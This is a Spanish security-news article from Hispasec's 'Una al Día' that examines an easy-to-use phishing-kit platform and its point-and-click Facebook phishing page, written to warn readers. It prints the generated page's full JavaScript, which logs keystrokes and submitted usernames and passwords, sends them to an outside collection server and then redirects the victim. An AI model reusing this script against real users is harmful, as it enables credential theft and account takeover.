• Saltar al contenido principal
  • Saltar a la barra lateral principal
  • Saltar al pie de página

Una al Día

Boletín de noticias de Seguridad Informática ofrecido por Hispasec

Usted está aquí: Inicio / General / La facilidad de los atacantes a día de hoy: Ataques de phishing a golpe de click

La facilidad de los atacantes a día de hoy: Ataques de phishing a golpe de click

23 julio, 2017 Por Daniel Púa Deja un comentario

No es novedad que a diario se venden miles de herramientas de hacking usadas con fines maliciosos. Estas herramientas, por regla general, requieren de un mínimo de conocimiento por parte del ciberdelincuente, pero a día de hoy esto está cambiando, y es que ya existen plataformas para realizar múltiples tipos de ataques sin saber siquiera el nombre del mismo.

Hoy vamos a exponer un caso de uso de unas de las múltiples plataformas que se pueden encontrar por Internet. El nombre de la web no va a ser publicado para no fomentar el uso de la misma entre los lectores.

Llama la atención al entrar en la web, la interfaz amigable y por qué no decirlo, infantil que tiene. Parece una página sin ninguna malicia, sin embargo contiene numerosos tipos de ataques los cuáles están gravemente penados por la ley en nuestro país.

Al registrarte, lo primero que aparece es un mensaje de bienvenida el cuál nos indica que tienen un pequeño tutorial para nosotros.

Bienvenida a la plataforma
Al avanzar, nos encontramos un “about” de la web. Nos explica que la página nos da acceso a una serie de “complejas herramientas” y que en pocos pasos vamos a aprender a usar una de ellas de manera gratuita.
Realmente las herramientas a las que te dan acceso son muy simples y apenas requieren de conocimientos para hacer el ataque de forma manual.
Por supuesto, no era de dudar que cuenta con una versión PREMIUM para sacar más provecho a la herramienta.
Avanzamos a través de los paneles y podemos comprobar cómo el primer ataque que nos enseña es la realización de un phishing a Facebook.
Cómo hackear una cuenta de Facebook!

Aunque nuestros lectores están habituados a escuchar la palabra phishing, vamos a recordar que es un  ataque de phishing aquel que mediante ingeniería social, se centra en adquirir cierta información confidencial de la víctima. Para ello, el cibercriminal se hace pasar por una persona o entidad (en este caso por la red social Facebook) para solicitarle esa información.
Un par de clicks y nos genera un enlace con una burda versión de la página de Facebook para que se la enviaemos a nuestra víctima.
Al ver la web cualquier persona con unos conocimientos mínimos no caería ni por el enlace, el cuál es muy llamativo, ni por la imagen que da, la cuál es bastante pobre. Pero, sin embargo, alguien sin conocimientos sí que podría pensar que es una página legítima.
Enlaces generados para el ataque de phishing
Página de Facebook generada para el ataque
Pero algo todavía mucho más llamativo, es que al escribir la contraseña ni siquiera oculte los caracteres como haría un campo de tipo contraseña.
Detalles de la contraseña en texto claro

Si comprobamos el código fuente de la web generada para el ataque, vemos que apenas son 127 líneas. Dentro de ellas, podemos encontrar un hotlinking a los iconos de Facebook en una página externa a Facebook:

http://www.questionpro.com/qp_userimages/sub-2/1419981/Facebook.png?userFileID=259491
http://www.portugalrx.com/wp-content/uploads/2016/02/facebook_logo.png

También podemos ver el script que nos redirecciona a Facebook una vez “iniciamos sesión en la página”:
   
var BigData = {
id: '3015',
token: 'i0n8QDoNAk8VHo8Pg3MKNcwtXE0LWT2zUAYBdL9qAOlTkZpB6s',
name: 'Facebook',
site_id: '9',
redirect: 'http://www.facebook.com/login',
hsData: "9|3015|i0n8QDoNAk8VHo8Pg3MKNcwtXE0LWT2zUAYBdL9qAOlTkZpB6s|1500371221",
};
var socket = io('https://pod-1.logshit.com');
socket.on('ping', function (data) {
socket.emit('hello', BigData );
});
socket.on('redirect', function(data){
window.location = BigData.redirect;
});
$(document).ready(function(){
$('body').click(function(e){
this.BigData = BigData;
socket.emit('clicked', this.BigData);
});
$('body').on('keyup', function(e){
this.BigData = BigData;
this.BigData.key = e.key;
socket.emit('keyup', this.BigData);
});
});
$("#login_form").keypress(function(e) {
if (e.which == 13) {
$("#submit").click();
}
});
$("#submit").click(function(e) {
e.preventDefault();
if ($("#username").val() == "") {
var err = "1";
alert('Username cannot be left empty');
}
if ($("#password").val() == "") {
var err = "1";
alert('Password cannot be left empty');
}
if (err != "1") {
socket.emit('log', {
username : $("#username").val(),
password : $("#password").val(),
hsData: BigData.hsData,
BigData: BigData,
});
}
});

Es un ataque de phishing muy básico pero que cualquier persona podría realizar sin ningún tipo de complicación ni conocimientos.
Al terminar de preparar el ataque, te recomiendan otras dos guías. La primera de ellas es para realizar un phishing a un correo electrónico y la segunda para ver los logs de las personas que han picado en el ataque.
Guías que ofrece el servicio

Si nos dirigimos al apartado de nuestra web creada, veremos cómo aparecen las estadísticas de las visitas recibidas:

Estadísticas de las visitas recibidas

Indagando un poco más en la página, podemos ver cómo ofrecen este servicio para realizar este tipo de ataque a 26 webs diferentes.
Servicios contra los que se puede crear un phishing a golpe de click
También cuentan con un market en el que puedes comprar o vender servicios. Los métodos de pago aceptados son muy variados, desde Bitcoin hasta Paypal pasando por Western Union y MoneyGram.
Servicios de pago aceptados
Si además pagamos por la cuenta PREMIUM antes mencionada, cabe destacar que tenemos acceso a más servicios, los cuáles parecen ser igual de mediocres que el anterior pero que con una víctima inexperta y un poco de ingeniería social, podrían ser realmente dañinos.

Servicios premium ofrecidos por la plataforma

Con esta una-al-día queríamos demostrar a nuestros lectores que hoy en día realizar acciones maliciosas en Internet no es complicado ni requiere de conocimientos Informáticos, pero en España puede llegar a incurrir en penas de 6 meses a 3 años de prisión. 
Para finalizar, recalcar que esta es una de las muchas plataformas de creación de phishing gratuitas que hay por Internet. Algunas más simples, otras más complejas, pero todas pueden ser usadas para realizar acciones maliciosas altamente penadas.
Daniel Púa
dpua@hispasec.com

Acerca de Daniel Púa

Daniel Púa Ha escrito 85 publicaciones.

  • View all posts by Daniel Púa →
  • Blog

Compártelo:

  • Twitter
  • Facebook
  • LinkedIn
  • Reddit
  • Telegram
  • WhatsApp

Publicaciones relacionadas

Publicado en: General

Interacciones con los lectores

Deja una respuesta Cancelar la respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.

Barra lateral principal

Buscar

Síguenos

siguenos en twitter

UAD360 EDICIÓN 2022

https://www.youtube.com/watch?v=go_CSWK56yU

Populares de UAD

  • Campañas de phishing utilizan Flipper Zero como cebo
  • Hydra, el malware que afecta tanto a entidades bancarias como a exchange de criptomonedas
  • Tamagotchi para hackers: Flipper Zero
  • USB Killer, el enchufable que puede freir tu equipo
  • Evasión de CloudTrail en AWS a través de API no documentada

Entradas recientes

  • Evasión de CloudTrail en AWS a través de API no documentada
  • Parches de enero 2023: Microsoft corrige 98 vulnerabilidades
  • UAD se abre a la comunidad
  • Campañas de phishing utilizan Flipper Zero como cebo
  • Vulnerabilidades críticas en productos de Synology
  • Más de dos docenas de errores de WordPress explotados por un nuevo malware de Linux
  • Descubierta una nueva campaña de malware que se propagaba a través de los anuncios de Google
  • Correo electrónico
  • Facebook
  • LinkedIn
  • RSS
  • Twitter

Footer

UAD

UAD nació a raíz de un inocente comentario en un canal IRC hace 24 años. A través de los archivos, un lector curioso puede ver cómo ha cambiado (o no) la seguridad de la información desde entonces.

Aviso Legal

  • Aviso Legal
  • Términos y Condiciones
  • Política de Privacidad
  • Política de Cookies

Copyright © 2023 · Hispasec Sistemas, S.L. Todos los derechos reservados

Este sitio web utiliza cookies propias y de terceros para fines analíticos y para mostrarte publicidad (tanto general como personalizada) relacionada con tus preferencias en base a un perfil elaborado a partir de tus hábitos de navegación (por ejemplo, páginas visitadas), para optimizar la web y para poder valorar las opiniones de los servicios consultados por los usuarios. Para administrar o deshabilitar estas cookies haz clic en: Configurar Cookies


Rechazar todo Aceptar Todo
Configurar Cookies

Resumen de privacidad

Este sitio web utiliza cookies para mejorar su experiencia mientras navega por el sitio web. De estas, las cookies que se clasifican como necesarias se almacenan en su navegador, ya que son esenciales para el funcionamiento de las funcionalidades básicas del sitio web. También utilizamos cookies de terceros que nos ayudan a analizar y comprender cómo utiliza este sitio web. Estas cookies se almacenarán en su navegador solo con su consentimiento. También tiene la opción de optar por no recibir estas cookies. Pero la exclusión voluntaria de algunas de estas cookies puede afectar su experiencia de navegación.
Necesaria
Siempre activado
Las cookies necesarias son absolutamente esenciales para que el sitio web funcione correctamente. Estas cookies garantizan funcionalidades básicas y características de seguridad del sitio web, de forma anónima.
CookieDuraciónDescripción
cookielawinfo-checkbox-analytics11 monthsEsta cookie está configurada por el complemento de consentimiento de cookies de GDPR. La cookie se utiliza para almacenar el consentimiento del usuario para las cookies en la categoría "Análisis".
cookielawinfo-checkbox-functional11 monthsLa cookie está configurada por el consentimiento de cookies de GDPR para registrar el consentimiento del usuario para las cookies en la categoría "Funcional".
cookielawinfo-checkbox-necessary11 monthsEsta cookie está configurada por el complemento de consentimiento de cookies de GDPR. Las cookies se utilizan para almacenar el consentimiento del usuario para las cookies en la categoría "Necesario".
cookielawinfo-checkbox-others11 monthsEsta cookie está configurada por el complemento de consentimiento de cookies de GDPR. La cookie se utiliza para almacenar el consentimiento del usuario para las cookies en la categoría "Otro.
cookielawinfo-checkbox-performance11 monthsEsta cookie está configurada por el complemento de consentimiento de cookies de GDPR. La cookie se utiliza para almacenar el consentimiento del usuario para las cookies en la categoría "Rendimiento".
viewed_cookie_policy11 monthsLa cookie está configurada por el complemento de consentimiento de cookies de GDPR y se utiliza para almacenar si el usuario ha dado su consentimiento o no para el uso de cookies. No almacena ningún dato personal.
Analítica
Las cookies analíticas se utilizan para comprender cómo interactúan los visitantes con el sitio web. Estas cookies ayudan a proporcionar información sobre métricas, el número de visitantes, la tasa de rebote, la fuente de tráfico, etc.
GUARDAR Y ACEPTAR